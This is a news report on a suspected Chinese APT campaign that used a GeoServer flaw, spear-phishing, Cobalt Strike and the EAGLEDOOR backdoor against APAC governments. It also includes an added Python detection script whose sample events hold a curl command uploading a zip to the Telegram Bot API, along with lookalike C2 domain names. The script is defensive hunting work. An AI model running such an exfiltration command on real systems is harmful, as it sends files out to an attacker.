Chinese Hackers Exploit GeoServer Flaw to Target APAC Nations with EAGLEDOOR Malware

A suspected China-nexus advanced persistent threat (APT) group targeted a government entity in Taiwan, and possibly other countries in the Asia-Pacific (APAC) region, by exploiting a recently patched critical security flaw in OSGeo GeoServer GeoTools.

The intrusion activity, which was observed by Trend Micro in July 2024, has been attributed to a threat actor tracked as Earth Baxia.

"Based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand," researchers Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, and Philip Chen said.

The discovery of lure documents written in Simplified Chinese suggests that China is also among the affected countries, although the cybersecurity firm said it does not have enough evidence to determine which sectors within the country were targeted.

The multi-stage infection chain uses two initial access vectors, spear-phishing emails and exploitation of the GeoServer flaw (CVE-2024-36401, CVSS score: 9.8), to ultimately deliver Cobalt Strike and a previously undocumented backdoor codenamed EAGLEDOOR, which supports information gathering and payload delivery.

"The threat actor employs GrimResource and AppDomainManager injection to deploy additional payloads, aiming to lower the victim's guard," the researchers noted, adding the former method is used to download next-stage malware via a decoy MSC file dubbed RIPCOY embedded within a ZIP archive attachment.

It's worth noting here that Japanese cybersecurity firm NTT Security Holdings recently described an activity cluster with ties to APT41 that it said used the same two techniques to target Taiwan, the Philippine military, and Vietnamese energy companies.

It's likely that the two intrusion sets are related, given the overlapping use of Cobalt Strike command-and-control (C2) domains that mimic Amazon Web Services and Microsoft Azure (e.g., "s3cloud-azure," "s2cloud-amazon," and "s3bucket-azure") and Trend Micro itself ("trendmicrotech").

The end goal of the attacks is to deploy a customized variant of Cobalt Strike, which acts as a launchpad for the EAGLEDOOR backdoor ("Eagle.dll") via DLL side-loading.

The malware supports four methods of communicating with its C2 server: DNS, HTTP, TCP, and Telegram. While the first three protocols are used only to report victim status, the core functionality is carried out over the Telegram Bot API, which is used to upload and receive files and to execute additional payloads. The collected data is exfiltrated using curl.exe.
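Two of the traits described above are directly huntable in endpoint telemetry: a command-line curl.exe posting to the Telegram Bot API, and DNS lookups for C2 hostnames that borrow cloud-provider brand names without living under the real provider domains. The following Python is an added example written for this page, not code from Trend Micro or from the malware. It runs over constructed, Sysmon-shaped event records (EventID 1 with Image/CommandLine, EventID 22 with QueryName); the bot token, the `.example` suffix appended to the lookalike names (the page gives no full domains), the allowlist of legitimate provider domains and the brand-token list are all assumptions to tune for your own environment.

```python
"""Hunt for EAGLEDOOR-style Telegram Bot API exfiltration and cloud-lookalike C2 domains.

Added example for this article. The sample events below are constructed and
mimic Sysmon field names; they are not real telemetry from the campaign.
"""
import re

# Assumed allowlist: registrable domains the lookalike C2 names impersonate.
LEGIT_SUFFIXES = (
    "amazonaws.com", "amazon.com",
    "azure.com", "azure.net", "microsoft.com", "windows.net",
    "trendmicro.com",
)
# Assumed brand tokens; a match in any non-TLD label is suspicious unless the
# host is under a legitimate suffix. Treat this as a hunting heuristic, not a
# blocking rule (e.g. "ns3." would match "s3").
BRAND_TOKENS = ("s3", "aws", "amazon", "azure", "bucket", "trendmicro")

# Telegram Bot API URLs have the fixed shape https://api.telegram.org/bot<token>/<method>
TELEGRAM_BOT_RE = re.compile(r"https?://api\.telegram\.org/bot([^/\s\"']+)/(\w+)", re.I)


def is_under(host, suffix):
    return host == suffix or host.endswith("." + suffix)


def check_process(event):
    """Flag a process-creation event whose command line targets the Telegram Bot API."""
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "")
    m = TELEGRAM_BOT_RE.search(cmd)
    if not m:
        return None
    token, method = m.group(1), m.group(2)
    return {
        "rule": "telegram_bot_api_via_process",
        "image": image.rsplit("\\", 1)[-1].lower(),
        "method": method,                      # e.g. sendDocument (upload), getUpdates (tasking)
        "bot_id": token.split(":")[0],         # keep only the numeric bot id, never the secret part
        "is_curl": image.lower().endswith("curl.exe"),
    }


def check_dns(event):
    """Flag DNS queries for hosts that carry a cloud brand token but are not under the real domain."""
    host = event.get("QueryName", "").lower().rstrip(".")
    if not host or any(is_under(host, s) for s in LEGIT_SUFFIXES):
        return None
    labels = host.split(".")
    hits = [t for t in BRAND_TOKENS if any(t in lbl for lbl in labels[:-1])]
    if not hits:
        return None
    return {"rule": "cloud_lookalike_domain", "host": host, "tokens": hits}


def scan_events(events):
    """Return a list of findings for a sequence of event dicts."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            f = check_process(ev)
        elif ev.get("EventID") == 22:
            f = check_dns(ev)
        else:
            f = None
        if f:
            findings.append(f)
    return findings


# Constructed sample input (not real telemetry). The token is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe -F "document=@C:\Users\Public\out.zip" '
                    r"https://api.telegram.org/bot000000000:EXAMPLE_NOT_A_REAL_TOKEN/sendDocument?chat_id=1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s https://www.example.com/"},            # benign
    {"EventID": 22, "QueryName": "s3cloud-azure.example"},
    {"EventID": 22, "QueryName": "s2cloud-amazon.example"},
    {"EventID": 22, "QueryName": "trendmicrotech.example"},
    {"EventID": 22, "QueryName": "s3.amazonaws.com"},                    # legitimate
    {"EventID": 22, "QueryName": "login.microsoftonline.com"},           # benign
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Against the constructed events the scan produces one process finding (curl.exe calling sendDocument) and three lookalike-domain findings; the legitimate `s3.amazonaws.com` lookup and the plain curl request are not flagged. In production, feed it parsed Sysmon or EDR events and pair the Telegram rule with proxy logs, since only the HTTP, TCP and DNS channels need to touch your own infrastructure while the Telegram traffic blends into a legitimate SaaS domain.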

"Earth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries," the researchers pointed out.

"They employed sophisticated tactics including GeoServer exploitation, spear-phishing, and bespoke malware (Cobalt Strike and EAGLEDOOR) to penetrate and exfiltrate data. The usage of public cloud services for storing malicious files and the multi-protocol support of EAGLEDOOR illustrate the intricacy and flexibility of their activities."
